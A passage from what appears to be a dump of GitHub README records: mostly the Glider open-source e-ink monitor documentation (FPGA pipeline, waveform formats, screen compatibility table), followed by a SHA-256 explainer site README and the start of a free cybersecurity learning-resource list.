or asynchronous (in case of clock domain crossing) FIFOs. The top-level design has 3 major clock domains: clk_vi: Input video clock domain, running at ½ pixel rate. clk_epdc: EPDC clock domain, running at ¼ pixel rate. clk_mem: Memory clock domain, running at ¼ memory transfer rate. To understand how it works, the following is a guided tour around the life cycle of a pixel. Before an incoming pixel can be processed by the controller, the memif module needs to retrieve the local pixel state from the DDR SDRAM. Once the value is retrieved, it’s pushed into the state readout/ input FIFO (bi_fifo). At/ around the same time, the input video stream is pushed into the video input FIFO (vi_fifo). The EPDC runs a local Eink timing generator for counting pixels and blankings. This timing should be a slightly delayed version of the incoming video timing. Once the local timing generator determines that it needs to output the pixel soon, the EPDC logic pops out one pair of the video input and state readout and starts processing. Two values go through the video processing pipeline: Stage 1: This pipeline stage waits for the FIFO to output the data. Stage 2: The 8-bit input image is dithered down to 1-bit and 4-bit at this stage for later use. Stage 3: The waveform lookup is done at this stage for 16-level grayscale modes Stage 4: Based on the pixel state, the new state and voltage selection value are determined at this stage. Stage 5: The new state is pushed into the state writeback/ out FIFO (bo_fifo) and the voltage selection is sent to the screen. The memif module later pops out the writeback value from the bo_fifo and writes it back to the DDR SDRAM. The EPDC always processes 4 pixels per clock. For screens with different interface widths, a rate adapter is added after the EPDC output. Some logic is duplicated 2 or 4 times (such as the waveform RAM or the pixel decision logic), while some are extended and daisy-chained (such as the error diffusion dithering unit) to achieve the 4 pixels per clock throughput. Firmware Functions The MCU manages housekeeping items as described below. It currently doesn’t use any operating system but rather relies on a main-loop style operation. EPD Power Supply: The power supply provides a common, source, and gate supply to the EPD panel. In addition to a basic on/off switch, the MCU can also adjust the VCOM voltage, and measure the optimal VCOM voltage of the panel installed. The VCOM measurement is done by isolating the VCOM supply from the screen while keeping the gate supply, scanning the screen with source = VCOM, and measuring the kick-back voltage on the VCOM. FPGA Bitstream Loading: The FPGA doesn’t have its own flash memory, the bitstream is pushed over SPI from the MCU to the FPGA upon powering up. In this way, the FPGA bitstream can be easily bundled together with the MCU’s firmware and updated together. Type-C Negotiation: The onboard USB Type-C port can support video input in addition to powering the board using the USB-C DisplayPort Alt Mode. The MCU runs a USB-C PD stack to communicate this capability to the video source device over standard USB PD protocol. The MCU also controls the Type-C signal mux to remap the lanes to the correct place depending on the cable orientation. Video decoder initialization: The FPGA used on the board doesn’t have high-speed deserializers to interface with common high-speed video interfaces such as DisplayPort or DVI directly. Instead, dedicated video decoder chips are used on the board. They typically need initialization before use, and the MCU takes care of this. In this specific design, the DP decoder chip also handles AUX P/N line flipping based on the Type-C cable orientation. PC communication: One advantage of the Caster is that update modes and forced update/ clearing can be applied on a per-pixel basis. Software may utilize this to assign different modes to different windows or change update modes depending on the content on the fly. This is done by sending requests to the MCU over a USB connection. The MCU runs TinyUSB and presents itself as an HID device so it can forward messages between the host PC and the FPGA. Low Latency Drive The Caster implements several techniques for reducing the latency, which will be explained here. As described before, the existing basic driving method employs a global counter for looking up the waveform table. This imposes a limit on the global image update rate: the controller only accepts a new incoming image after the previous update is finished. The update usually takes about 100ms, translating to an image rate of 10Hz. Or, in other words, the user needs to potentially wait up to 100ms before the new image is even processed by the controller. One way to mitigate this issue is by having multiple update regions. For example, imagine the user is typing a and b. In a single region controller design, a is drawn to the screen immediately, while the b needs to wait 100ms before it gets drawn. If the controller supports multiple regions, it could start drawing the letter b as soon as it’s typed, reducing the latency. This however requires the software to program the controller to correctly set the region to the letter boundary, and re-allocating regions on the fly as the number of regions is generally quite limited (like 4-16). The Caster simply treats every pixel as an individual update region, for maximum flexibility and is transparent to the software. Another latency optimization technique the Caster implemented is on the pixel that’s already being updated. For example, if the user types the letter a and deletes it right after. With the basic driving method, the controller needs to wait till the letter a is fully displayed before it can erase it. The previously proposed/ implemented regional update doesn’t help here because in this situation it’s about the same pixel so it has to be in the same region. The second technique is early cancellation. If a pixel changes before it’s fully driven, instead of waiting for it to be fully driven, it’s driven toward the requested input state, and the frame counter is updated depending on the newly calculated driving time. By combining both, it’s then possible to implement low-latency binary and 4-level grayscale modes. The tradeoff between framerate and contrast ratio is also no longer relevant. Both a high frame rate and high contrast ratio are achieved automatically. Hybrid Greyscale Mode As discussed previously, getting greyscale image on Eink is a sophisticated process, much slower than binary, and shows flashing images during the process. This poses challenges on how to make it useful for the users. On eReaders, the software could switch between fast and slow modes based on the action. The eReader software may also simply not support things that don’t work well on the screen. For example, there might be no scrolling but only whole page flipping. What’s being done on existing eink monitors is throwing the problem back to the user. The user simply needs to accept that the update is slow, the latency is long, and the process is flashing. What Caster implemented is allowing it to switch between the fast binary mode and slow greyscale mode automatically on a per-pixel basis. When the input image is changed, it switches to binary mode and does the update. When the image hasn’t changed for a while, it re-renders the image in greyscale. Limitations The method does come with downsides: it requires much more memory bandwidth to implement. Taking a 1080P panel as an example (roughly 120 Mp/s (million pixels per second) with reduced blanking). With the traditional method, the controller only needs the old pixel state and the new pixel state (4bpp each) to determine the voltage needed or 8-bit/ 1-byte memory read per pixel. The bandwidth requirement is then 120Mp/s x 1B/pixel = 120MB/s. One single 16-bit SDR-133 SDRAM is more than enough to handle this. The Caster currently stores a 16-bit state per pixel (for 2 sets of old pixel values and pixel-specific timer counters), and the pixel state needs to be updated per frame, so the pixel state buffer alone requires 2-byte read and 2-byte write per pixel. It then takes another 0.5-byte per pixel to read the new image value from memory. 120Mp/s x 4.5B/pixel = 540MB/s. A 16-bit DDR-333 memory is then needed to implement this. The Glider hardware uses a DDR3-800 memory to allow even higher resolution. If the controller is not integrated inside an SoC (like our case, the controller is sitting inside the monitor, not part of your PC’s CPU/GPU), it also needs to use actual low latency video interfaces like DVI or DP, instead of simpler but slower interfaces like USB or I80/SPI. This could drive up costs as well. These techniques also don't help with use cases like reading books, so commercial e-reader solutions have little reason to spend the extra trouble to implement these. Hardware Design Decisions To be written (TODO) Resources Utilization The following numbers are for reference only and would vary depending on RTL options and specific targets. 1704 FF 2531 LUT6 60 KB BRAM Building PCB The PCB is designed with KiCAD 8.0. To get optimal results, use a 4-layer stack up with 1080 PP layers, but 2313 or 3313 are also acceptable. There are 2 versions of the mainboard, one full version, and a lite version. For now, only the full version is being actively worked on. The lite version removes dedicated external decoders for DVI/ DP and removes the bulk of the TypeC circuitry to lower the cost. The only video interface is a DVI port feeding directly into the FPGA. FPGA Bitstream To be written (TODO) MCU Firmware To be written (TODO) Working with Waveforms The following section describes the waveform file format and how to use it. Obtaining Waveform In general, the screen vendor (Eink, Good Display, etc.) should provide the waveform file. If your screen has a flash chip on it, it's also possible to extract the waveform from a flash dump: dd if=somedump.bin of=waveform.wbf bs=1 skip=2182 If you have access to an application board, it might also be possible to extract the waveform there. For example, if the system uses a T1000 controller, the waveform is usually stored in the SPI flash connected to the T1000. Waveform Formats E-Ink distributes waveforms in the wbf file format. SoC/ Eink controller hardware often requires converting the file into a vendor-specific file format. Caster/ Glider also uses a specific binary format. This project defines a common human-readable format (Interchangeable Waveform Format, IWF) and provides several tools for working with different binary formats and the IWF format. Interchangeable Waveform Format The waveform consists of one descriptor file in iwf extension (ini format) and various lut data files in csv format. The descriptor contains the following required fields: VERSION: the version of the descriptor (should be 2.0) NAME: (optional) original name for the waveform BPP: (optional, default 4) 4 or 5, representing the internal state count used for waveform PREFIX: the filename prefix for actual waveform files MODES: the total modes supported by the waveform TEMPS: the total number of temperature ranges supported by the waveform TxRANGE: the supported temperature in degC, where x is the temperature ID TUPBOUND: (optional) upper bound for temperature range, each range is TxRANGE to Tx+1RANGE (or TUPBOUND in case of the last one) TABLES: total number of LUTs inside the waveform TBxFC: the frame count for the table, where x is the LUT ID Each mode has its own mode section named [MODEx], where x is the mode ID, containing the following fields: NAME: the name for that mode T*TABLE: the table used for the temperature in that mode There should be a number of LUTs, saved in the filename like PREFIX_TBx.csv, where x is the LUT ID. Each csv file should contain a LUT like this: lut[src][dst][frame], which means, to transition from src greyscale level to dst greyscale level, at a certain frame in a frame sequence, what voltage should be applied to the screen (0/3: GND / Keep, 1: VNEG / To black, 2: VPOS / To white). Each line contains the frame sequence for one or more source-to-destination pairs. For example: 4,7,1,1,1,0,2 means to transition from greyscale level 4 to greyscale level 7, there should be 5 frames, each applying VNEG VNEG VNEG GND VPOS 0:14,15,2,2,2 means to transition from any greyscale level between 0 and 14 to greyscale level 15, there should be 3 frames, each applying VPOS VPOS VPOS These are provided to only illustrate the file format, they are not valid or meaningful Eink driving sequences. Converting The following converters are provided in the repo: To convert from iwf to fw (iMX6/7 EPDC format): ./mxc_wvfm_asm v1/v2 input.iwf output.fw To convert from fw to iwf: ./mxc_wvfm_dump v1/v2 input.fw output_prefix To convert from wbf to iwf: ./wbf_wvfm_dump input.wbf output_prefix Compatible Screens This project only focuses on driving off-the-shelf active matrix electrophoretic displays without integrated controllers. See Screen Panels for differences between different types of screen panels available. That being said, this project is compatible with the majority of these panels, including sizes from 4.3" up to 13.3", and potentially supporting panels as large as 42" as well (additional power supply required in that case). Screen Adapters Different screen panels have different connectors. It would take a huge amount of space to have every possible screen connector on the motherboard. Instead, a series of different screen adapters are provided to adapt to the screen with different pinouts. The mainboard natives support certain 40-pin screens, such as: 10.3" 1872x1404: ED103TC1, ES103TC2 10.1" 2232x1680: GDEW101M01, GDEW101C01 To see which adapter might work for your screen, check out the Appendix 1 - Screen List Pixel Rate Considerations The input protocol and processing rate limit the screen model supported. Limit from processing rate (logic and routing delay): Processing rate when dithering enabled: 133 MP/s Processing rate when dithering disabled: 280 MP/s Estimated processing rate with 8-wide design: 500 MP/s Limit from video interface: Maximum pixel rate using DVI (with ADV7611): 165 MP/s Maximum pixel rate using DVI (direct deserializer): 105 MP/s Maximum pixel rate using DisplayPort (with PTN3460): 224 MP/s Maximum pixel rate using DisplayPort (with 7-series 6G SerDes): 720 MP/s Maximum pixel rate using MIPI (with 1.05Gbps LVDS): 230 MP/s Limit from memory interface (assuming 90% BW utilization): SDR-166 x16: 60 MP/s SDR-166 x32: 120 MP/s DDR-400 x16: 180 MP/s DDR2/3-667 x16: 300 MP/s DDR2/3-800 x16: 360 MP/s DDR2/3-1066 x16: 480 MP/s DDR2/3-800 x32: 720 MP/s Common screen resolution peak pixel rate (with CVT-RBv2): 1024x758 (6.0") @ 85Hz: 74 MP/s 1448x1072 (6.0") @ 60Hz: 101 MP/s 1448x1072 (6.0") @ 85Hz: 145 MP/s 1600x1200 (13.3") @ 60Hz: 125 MP/s 1600x1200 (13.3") @ 85Hz: 178 MP/s 1872x1404 (10.3") @ 60Hz: 169 MP/s 1872x1404 (10.3") @ 85Hz: 243 MP/s 1920x1440 (8.0") @ 60Hz: 177 MP/s 1920x1440 (8.0") @ 85Hz: 255 MP/s 2200x1650 (13.3") @ 60Hz: 232 MP/s 2200x1650 (13.3") @ 85Hz: 333 MP/s 2560x1600 (12.0") @ 60Hz: 261 MP/s 2560x1600 (12.0") @ 85Hz: 374 MP/s 2560x1920 (13.3") @ 60Hz: 313 MP/s 2560x1920 (13.3") @ 85Hz: 449 MP/s 3200x1800 (25.3") @ 60Hz: 364 MP/s 3200x1800 (25.3") @ 85Hz: 522 MP/s ( Calculate yourself: Video Timings Calculator by Tom Verbeure ) Rendering the grayscale requires the screen to be refreshed at 85Hz (85Hz is the supported refresh rate by Eink, 60Hz can be made to work with some effort in some cases). Running an input refresh rate lower than the internal refresh rate incurs additional processing latency from both source (PC) and monitor due to buffering. Case A reference case design is provided. The case is 3D printable and designed with FreeCAD. Note the design is currently outdated. References Here is a list of helpful references related to driving EPDs: Reverse engineering and explanation on driving EPDs: http://essentialscrap.com/eink/index.html An early Eink DIY project with many useful info: http://spritesmods.com/?art=einkdisplay&page=1 STM32 Software bit-banging EPD driver with grayscale: https://hackaday.io/project/11537-nekocal-an-e-ink-calendar ESP32 board designed for driving parallel EPDs: https://github.com/vroland/epdiy An early tool for reading Eink's wbf file format: https://github.com/fread-ink/inkwave A more up-to-date Eink's wbf format parser: https://patchwork.kernel.org/project/linux-arm-kernel/patch/20220413221916.50995-2-samuel@sholland.org/ On the topic of color screen resolution, color mapping, and subpixel rendering: Klompenhouwer, Michiel A., and Erno H. A. Langendijk. “59.4: Comparing the Effective Resolution of Various RGB Subpixel Layouts.” SID International Symposium Digest of Technical Papers, vol. 39, no. 1, 2008, pp. 907–10, https://doi.org/10.1889/1.3069822. Lai, Chih-chang, and Ching-chih Tsai. “A Modified Stripe-RGBW TFT-LCD with Image-Processing Engine for Mobile Phone Displays.” IEEE Transactions on Consumer Electronics, vol. 53, no. 4, 2007, pp. 1628–33, https://doi.org/10.1109/TCE.2007.4429262. License This document, other than references explicitly given with their corresponding license, is released into the public domain. The hardware design is released under the CERN Open Source Hardware License strongly-reciprocal variant, CERN-OHL-S. A copy of the license is provided in the source repository. Additionally, a user guide of the license is provided on ohwr.org. The firmware code is licensed under the MIT license with the following exceptions: The USB PD library is derived from the Chromium OS project and the reclamier labs. The library is licensed under the BSD license. Appendix Using Screens without Datasheet To be written Screen List This is a list of Eink screens their key parameters and their compatibilities with Caster/ Glider. The information is gathered from public sources, so they might be incorrect. This is not a complete list of all screens Eink has ever produced or is in production. This table is intended for hobbyists buying used screens. If you are designing a product with Eink screen please contact Eink directly. Other than a few exceptions, only screens without integrated TCON are listed here (in other words, SPI screens are generally not included here). These screens are the main focus of this project anyway. Screen size is the first 3 numbers in the model number, so it's not listed separately in the table. For example, ED060SC4 is 6.0", ED097OC1 is 9.7", and ES133UT1 is 13.3". The adapter column refers to the adapter needed for this particular screen, however, there is no guarantee that it would work, even if it's listed as tested. | Model Name | Model Number | FPL Platform | Resolution | Marketing Name | R Typ | CR Typ | Year | Interface | Pin Count | Adapter | Tested? | | ---------- | ------------ | ------------ | ----------- | --------------------------- | ----- | ------ | ----- | --------- | --------- | ------- | ------- | | ED038TH1 | | V320 | 600x600 | Carta | 45% | 17:1 | 2015 | TTL | 34 | 34P-A | | | ET040TC1 | | | 720x480 | Pearl | | | | TTL | | | | | ET040TC2 | | | 720x480 | Pearl | | | | TTL | | | | | ED043WC1 | | V220 | 800x480 | Pearl | 35% | 12:1 | 2013 | TTL | 39 | 39P-C | | | ED043WC3 | VA3200-DCA | V220 | 800x480 | Pearl | | | 2014 | TTL | 39 | 39P-C | | | ED043WC5 | VD1405-CGA | 400 | 800x480 | Carta 1200 | | | | SPI | | | | | ED047TC1 | | V220 | 960x540 | Pearl | 35% | 12:1 | 2015 | TTL | 44 | | | | ED047TC2 | | V220 | 960x540 | Pearl | 35% | 12:1 | 2016 | TTL | 44 | | | | ET047TC1 | | 320 | 960x540 | Carta 1.2 | | | | TTL | | | | | ET047TC2 | | 320 | 960x540 | Carta 1.2 | | | | TTL | | | | | ED050SC3 | | V110 | 800x600 | Vizplex | 35% | >6:1 | 2008 | TTL | 33 | 33P-A | | | ED050SU3 | | V220 | 800x600 | Pearl | | | | TTL | 39 | | | | ED052TC2 | | 320 | 960x540 | Carta | 45% | 16:1 | 2016 | TTL | 40 | | | | ED052TC4 | VB3300-EBA | 320 | 1280x720 | Carta 1.2 | 45% | 16:1 | 2017 | TTL | 50 | | | | EC058TC1 | SA1452-EHA | 320 | 1440x720 | Kaleido / Carta | 24% | 15:1 | 2020 | TTL | 50 | | | | ED058TC7 | | 320 | | Carta | | | | TTL | | | | | ED058TC8 | VB3300-EHB | 320 | 1440x720 | Carta | | | | TTL | | | | | ED060SC1 | | 2.1 | 800x600 | | | | | TTL | 39 | 39P-B | | | ED060SC3 | | V100 | 800x600 | Vizplex | | | | TTL | 39 | 39P-B | | | ED060SC4 | | V110 | 800x600 | Vizplex | 35% | >6:1 | 2008 | TTL | 39 | 39P-B | | | ED060SC7 | | V220E | 800x600 | Pearl | 40% | 12:1 | 2010 | TTL | 34 | 34P-B | | | ED060SCA | | V110 | 800x600 | Vizplex | | | | TTL | | | | | ED060SCE | | V220/V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-B | | | ED060SCF | | V220 | 800x600 | Pearl | | | | TTL | 34 | 34P-A | | | ED060SCG | | V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-B | | | ED060SCN | | V220E | 800x600 | Pearl | | | | TTL | 34 | 34P-A | | | ED060SCS | | | 800x600 | | | | | TTL | 34 | 34P-B | | | ED060SCP | | V220 | 800x600 | Pearl | | | | TTL | 34 | 34P-A | | | ED060SCQ | | V220 | 800x600 | Pearl | | | | TTL | | | | | ED060SCS | | | 800x600 | | | | | TTL | | | | | ED060SCT | | 320 | 800x600 | Carta | | | | TTL | 34 | 34P-B | | | ED060SD1 | | 320 | 800x600 | Carta | | | | TTL | | | | | ED060XC3 | | V220 | 1024x758 | Pearl | | | | TTL | 34 | 34P-A | Yes | | ED060XC5 | | V220 | 1024x758 | Pearl | 35% | 12:1 | 2011 | TTL | 34 | 34P-A | | | ED060XC8 | | V320 | 1024x758 | Carta | | | | TTL | 35 | 35P-A | Yes | | ED060XC9 | | | 1024x758 | | | | | TTL | 34 | 34P-A | | | ED060XCD | | 320 | 1024x758 | Carta | | | | TTL | | | | | ED060XCG | VD1405-FOA | 320/400 | 1024x758 | Carta 1000 / 1200 | 40% | 17:1 | 2020 | TTL | | | | | ED060XCH | VD1405-FOE | 400 | 1024x758 | Carta 1200 | | | | TTL | | | | | ED060XD4 | | 320 | 1024x758 | Carta | | | | TTL | 34 | 34P-A | Yes | | ED060XD6 | | | 1024x758 | | | | | TTL | 34 | 34P-A | | | ED060XG1 | | V110/V220 | 1024x758 | Vizplex / Pearl | 40% | 12:1 | 2012 | TTL | | | | | ED060XG2 | | V220 | 1024x758 | Pearl | | | | TTL | | | | | ED060XG3 | | 320 | 1024x758 | Carta | | | | TTL | | | | | ED060XH2 | | | 1024x758 | | | | | TTL | 34 | 34P-A | | | ED060XH7 | | 320 | 1024x758 | Carta 1.2 | 45% | 17:1 | 2015 | TTL | | | | | ED060XH9 | VB3300-FOG | 320 | 1024x758 | Carta | | | | TTL | | | | | ED060TC1 | | 320 | 1448x1072 | Carta | | | | TTL | 35 | 35P-A | | | ED060KC1 | | 320 | 1448x1072 | Carta | 46% | 17:1 | 2014 | TTL | 34 | 34P-A | | | ED060KC4 | | 320 | 1448x1072 | Carta | | | | TTL | | | | | ED060KD1 | | 320 | 1448x1072 | Carta | | | | TTL | 34 | 34P-A | Yes | | ED060KG1 | | 320 | 1448x1072 | Carta | 47% | 17:1 | 2015 | TTL | 34 | 34P-A | | | ED060KH4 | | 320 | 1448x1072 | Carta | | | | TTL | | | | | ED060KH6 | VB3300-FOE | 320 | 1448x1072 | Carta | | | | TTL | | | | | ED060KHC | | | 1448x1072 | | | | | TTL | | | | | ED060KHE | VD1405-FOH | | 1448x1072 | Carta 1300 | | | | TTL | 34 | 34P-A | | | EC060KH3 | SA1452-FOA | | 1448x1072 | Kaleido | | | | TTL | | | | | EC060KH5 | SC1452-FOD | | 1448x1072 | Kaleido 3 | | | | TTL | 34 | 34P-A | | | ED061KC1 | VD1405-FAA | 400 | 1648x824 | Carta 1200 | | | | TTL | | | | | ED067KC1 | VB3300-FGA | 320 | 1800x900 | Carta | 45% | 16:1 | 2020 | TTL | 50 | 50P-B | | | EC067KC1 | SA1452-FGA | | 1800x900 | Kaleido | | | | TTL | 50 | 50P-B | | | ED068TG1 | | 320 | 1440x1080 | Carta | | | <2013 | TTL | | | | | ED068TH1 | | 320 | 1440x1080 | Carta | | | <2014 | TTL | | | | | ED068TH3 | VB3300-FHA | 320 | 1440x1080 | Carta | | | | TTL | | | | | ED068KC1 | | 400SU | 1648x1236 | Carta 1200 | | | | TTL | 40 | | | | ED068KC3 | VD1405-FHD | 400 | 1648x1236 | Carta 1200 | | | | TTL | 40 | | | | ED068KC5 | VD1405-FHF | 400 | 1648x1236 | Carta 1200 | >44% | >19:1 | | TTL | 40 | | | | ED070KC2 | | 320 | 1680x1264 | Carta 1100 | >47% | >16:1 | | TTL | | | | | ED070KC3 | | 320 | 1680x1264 | Carta 1100 | | | | TTL | | | | | ED070KC4 | VD1400-GOC | 400 | 1680x1264 | Carta 1200 | | | | TTL | | | | | ED070KH1 | | 320 | 1680x1264 | Carta 1100 | | | | TTL | | | | | EC070KH1 | SC1452-GOA | | 1680x1264 | Kaleido Plus | | | | TTL | | | | | LB071WS1 | | | 1024x600 | | | 7:1 | | TTL | | | | | ET073TC1 | | V320 | 750x200 | Carta | | | 2016 | TTL | | | | | ED078KC1 | | | 1872x1404 | Carta 1.2 | 45% | 16:1 | 2016 | TTL | 40 | 40P-A | | | ED078KC2 | VB3300-GHC | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | | | ED078KH1 | | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | | | ED078KH3 | | 320 | 1872x1404 | Carta 1.2 | | | | TTL | 40 | 40P-A | | | ED078KH4 | VB3300-GHB | 320 | 1872x1404 | Carta | | | | TTL | 40 | 40P-A | | | EC078KH3 | SC1452-GHA | | 1872x1404 | Kaleido Plus | | | | TTL | 40 | 40P-A | | | EC078KH4 | SC1452-GHB | | 1872x1404 | Kaleido Plus ? | | | | TTL | 40 | 40P-A | | | EC078KH5 | SC1452-GHC | | 1872x1404 | Kaleido Plus ? | | | | TTL | 40 | 40P-A | | | EC078KH6 | SC1452-GHD | | 1872x1404 | Kaleido 3 | | | | TTL | 40 | 40P-A | | | EC078KH7 | SC1452-GHE | | 1872x1404 | Kaleido 3 | | | | TTL | 40 | 40P-A | | | ED080XC1 | | V110 | 1024x768 | Vizplex | | | | TTL | | | | | ED080TC1 | | V220 | 1600x1200 | Pearl | | | | TTL | | | | | EC080SC2 | | V250 | 600xRGBx800 | Triton 2 | | | | TTL | 40 | 40P-A | Yes | | ES080KC2 | VD1400-HOB | 400 | 1920x1440 | Carta 1200 | | | | TTL | | | | | ES080KH1 | | | | | | | | | | | | | AC080KH1 | AD1004-HOA | HAL3 | 1920x1440 | Gallery 3 | | | | MiniLVDS | | | | | ED097OC1 | | V110A | 1200x825 | Vizplex | 35% | 7:1 | 2008 | TTL | 33 | 33P-A | | | ED097OC4 | | V110A/V220 | 1200x825 | Vizplex / Pearl | | | | TTL | 33 | 33P-A | | | ED097OD2 | | V220 | 1200x825 | Pearl | | | | TTL | 33 | 33P-A | | | ED097TC1 | | V220 | 1200x825 | Pearl | | | | TTL | 33 | 33P-A | | | ED097TC2 | VB3300-JGA | 320 | 1200x825 | Carta 1.2 | 42% | 16:1 | 2016 | TTL | 33 | 33P-A | | | EL097TR2 | EA2220-JGB | | 1200x825 | Spectra 3000 | | | | TTL | | | | | ED100UC1 | VB3300-KOA | 320 | 1600x1200 | Carta | 45% | 16:1 | 2020 | TTL | 40 | DIRECT | | | ES103TC1 | VB3300-KCA | 320 | 1872x1404 | Carta 1.2 | 40% | 12:1 | 2016 | TTL | 40 | DIRECT | | | ED103TC2 | VB3300-KCD | 320 | 1872x1404 | Carta | 43% | 14:1 | 2019 | TTL | 40 | DIRECT | | | ES103TD1 | | 320 | 1872x1404 | Carta | | | | TTL | | | | | ES103TD3 | | 320 | 1872x1404 | Carta | | | | TTL | | | | | EC103TD1 | SA1452-KCC | | 1872x1404 | Kaleido | | | | TTL | | | | | EC103TH2 | SC1452-KCB | | 1872x1404 | Kaleido Plus | | | | TTL | | | | | EC103KH2 | SC1452-KCD | | 2480x1860 | Kaleido 3 | | | | TTL | | | | | ES107KC1 | VD1400-KGA | 400 | 2560x1920 | Carta 1200 | | | | TTL | | | | | ES108FC1 | | 320 | 1920x1080 | Carta | 46% | 16:1 | 2017 | TTL | 50 | 50P-C | | | ES108FC2 | | 320 | 1920x1080 | Carta | | | | TTL | | | | | ED113TC1 | VB3300-LCA | 320 | 2400x1034 | Carta | 35% | 12:1 | 2017 | TTL | 50 | 50P-A | | | ED113TC2 | VB3300-LCB | 320 | 2400x1034 | Carta 1.2 | 35% | 12:1 | 2019 | TTL | 50 | 50P-A | | | EC113TC1 | SC1452-LCA | | 2400x1034 | Kaleido Plus ? | | | | TTL | 50 | 50P-A | | | ED115OC1 | | V220 | 2760x2070 | Pearl | 35% | 12:1 | 2012 | TTL | 40 | DIRECT | | | AC118TC1 | AD1004-LHA | | | Gallery 3 | | | | MiniLVDS | | | | | ES120MC1 | VD1400-MOA | 400 | 2560x1600 | Carta 1200 | | | | TTL | 40 | | | | ES133UT1 | | V220 | 1600x1200 | Pearl | 35% | 12:1 | 2013 | TTL | 39 | 39P-A | Yes | | ES133UT2 | | 320 | 1600x1200 | Carta | | | | TTL | 39 | 39P-A | Yes | | ES133UE2 | | 320 | 1600x1200 | Carta | | | | TTL | 39 | 39P-A | | | ED133UT2 | VB3300-NCB | 320 | 1600x1200 | Carta 1.2 | 45% | 16:1 | 2016 | TTL | 39 | 39P-A | | | ED133UT3 | VB3300-NCC | 320 | 1600x1200 | Carta | 45% | 16:1 | 2019 | TTL | 39 | 39P-A | | | ES133TT3 | | 320 | 2200x1650 | Carta 1.2 | 40% | 12:1 | 2016 | TTL | 39 | | | | ES133TT5 | VH1948-NCC | 450 | 2200x1650 | Carta 1250 | | | | TTL | 39 | | | | EC133UJ1 | SD1452-NCB | | 1600x1200 | Kaleido 3 Outdoor | | | | TTL | 39 | 39P-A | | | AC133UT1 | AA1020-NCA | | 1600x1200 | Gallery / Gallery 4000 | 35% | 10:1 | 2020 | TTL | 39 | 39P-A | | | EL133US1 | | | 1600x1200 | Spectra 3000 | | | | TTL | 39 | 39P-A | Yes | | EL133UR1 | EA2220-NCC | | 1600x1200 | Spectra 3000 | 33% | 15:1 | 2020 | TTL | 39 | 39P-A | | | EL133UF1 | ED2208-NCA | | 1600x1200 | Spectra 6 | | | | QSPI | | | | | ED140TT1 | VB3300-IDA | 320 | 1440x300 | Carta | | | | TTL | | | | | AC253TT1 | AA1020-PEA | | 3200x1800 | Gallery Plus / Gallery 4000 | 35% | 10:1 | 2020 | MiniLVDS | 51x2 | | | | EL253EW1 | ED2208-PEA | | 3200x1800 | Spectra 6 | | | | MiniLVDS | | | | | EC253TT1 | SD1452-PEA | | 3200x1800 | Kaleido 3 Outdoor | | | | MiniLVDS | | | | | ED253TT1 | VB3300-PEA | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | | | ED253TT2 | VB3300-PEB | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | | | ED253TT3 | VB3300-PEC | 320 | 3200x1800 | Carta 1.2 | | | | MiniLVDS | 51x2 | | | | EL253TV1 | EB2200-PEA | | 3200x1800 | Spectra 3100 | | | | MiniLVDS | 51x2 | | | | ED280TT1 | VB3300-PHA | 320 | 3840x1080 | Carta 1.2 | 40% | 12:1 | 2020 | MiniLVDS | 51x2 | | | | ED312TT2 | VA3200-QAA | V220 | 2560x1440 | Pearl | | | | TTL | 50x4 | | | | ED312TT3 | VA3200-QAB | V220 | 2560x1440 | Pearl | 40% | 12:1 | 2018 | TTL | 50x4 | | | | EC312TT2 | SB1452-QAA | V220 | 2560x1440 | Triton | | | | TTL | 50x4 | | | | EL315TW1 | ED2208-QBA | | 2560x1440 | Spectra 6 | | | | QSPI | | | | | ED420TT1 | | V220 | 2880x2160 | Pearl | | | | TTL | 50x2 | | | | ED420TT3 | VB3300-RBA | 320 | 2880x2160 | Carta 1.2 | 45% | 16:1 | 2020 | TTL | 50x2 | | | | ED420TT5 | VB3300-RBB | 320 | 2880x2160 | Carta 1.2 | | | | TTL | 50x2 | | | Note: Carta 1.2 is also known as Carta 1000. If the table cell says Carta it also likely means Carta 1000 (could be 1100 as well, I don't know for sure).;Open-source E-ink monitor. Mirror of https://gitlab.com/zephray/glider;[]
Modos-Labs/Glider
dmarman/sha256algorithm;Sha256algorithm Sha256 algorithm explained online step by step visually sha256algorithm.com This website will help you understand how a sha256 hash is calculated from start to finish. I hope this will be helpful for students learning about hash functions and sha256. The code it's quite messy and probably there are some parts that don't follow the react way. Ask me anything at @manceraio Install I built this using create-react-app. If you want to play with it, just install javascript dependencies: npm install and start local server: npm start;Sha256 Algorithm Explained;[]
dmarman/sha256algorithm
brootware/awesome-cyber-security-university;Awesome Cyber Security University A curated list of awesome and free educational resources that focuses on learn by doing. Because education should be free. Contents About Introduction and Pre-Security - (Completed/In Progress) Free Beginner Red Team Path - (Add your badge here. The badge code is hidden in this repo) Free Beginner Blue Team Path - (Add your badge here. The badge code is hidden in this repo) Bonus CTF practice and Latest CVEs - (Completed/In Progress) Bonus Windows - (Completed/In Progress) Extremely Hard Rooms to do - (Completed/In Progress) About Cyber Security University is A curated list of awesome and free educational resources that focus on learning by doing. There are 6 parts to this. 1. Introduction and Pre-security 2. Free Beginner Red Team Path 3. Free Beginner Blue Team Path 4. Bonus practices 5. Latest CVEs 6. Extremely Hard rooms The tasks are linear in nature of the difficulty. So it's recommended to do it in order. But you can still jump around and skip some rooms If you find that you are already familiar with the concepts. As you go through the curriculum, you will find completion badges that are hidden within this README.md for both red and blue team path completion badges. You can copy the HTML code for them and add it to the content page below once you have completed them. ↑ Contributing Pull requests are welcome with the condition that the resource should be free! Please read the contribution guide in the wiki if you wish to add tools or resources. Introduction and Pre-Security Level 1 - Intro OpenVPN - Learn how to connect to a virtual private network using OpenVPN. Welcome - Learn how to use a TryHackMe room to start your upskilling in cyber security. Intro to Researching - A brief introduction to research skills for pentesting. Linux Fundamentals 1 - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. Linux Fundamentals 2 - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. Linux Fundamentals 3 - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. Pentesting fundamentals - Fundamentals of penetration testing. Principles of security - Principles of security. Red Team Engagements - Intro to red team engagements. Hip Flask - An in-depth walkthrough covering pentest methodology against a vulnerable server. Introductory CTFs to get your feet wet Google Dorking - 